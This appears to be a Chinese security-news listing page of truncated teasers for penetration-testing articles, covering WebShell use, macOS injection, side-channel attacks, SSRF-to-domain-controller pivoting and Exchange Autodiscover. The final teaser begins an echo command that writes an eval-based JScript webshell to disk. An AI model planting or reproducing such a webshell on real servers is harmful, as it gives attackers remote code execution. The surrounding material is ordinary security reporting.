在某项目外围打点的过程中,通过文件上传拿到一个 WebShell。通过 WebShell 能够执行大多数的命令,且直接是 System 权限,但却无法执行 dir 进行列目录,导致冰蝎和蚁剑都无法使用...
通过第三方框架注入macOS
更多全球网络安全资讯尽在邑安全自从加入TrustedSec AETR团队以来,我花了一些时间研究MacOS环境下的攻击技术。不幸的是对我们这些攻击者来说,对于macOS系统的攻击是越来越难的。苹果公司...
隔空取物之侧信道攻击
前言在学习CISSP密码学时了解到侧信道攻击(又称边信道攻击、旁路攻击side-channel attack),攻击者通过测量功耗、辐射排放以及进行某些数据处理的时间,借助这些信息倒推处理过程,以获得...
跌宕起伏收款到账
哈喽大家好我是城南,近日收到粉丝求助,我把QQ发给了他,而后…晚上10点整,他加我为好友以后立马给我发来一段语音,他那青涩又稚嫩的嗓音,不由让手机这头的我觉得有些可惜,但对于那个连个孩子的钱都骗的人,...
SSRF-->Redis-->DC 全过程模拟记录
更多全球网络安全资讯尽在邑安全因为最近遇到一次实战,环境较为敏感,就不通过用真实环境来记录了。我通过模拟环境来记录最终拿下域控的全过程,网络环境如下:通过Vulstack的靶场模拟内网环境同DMZ网段...
渗透基础——Exchange Autodiscover的使用
0x00 前言Autodiscover是Exchange的一个服务,用来简化客户端应用程序的配置流程。用户只需要输入自己的电子邮件地址和密码,就能够通过Autodiscover服务获取运行客户端应用程...
sa权限获取webshell思路
echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe")...
4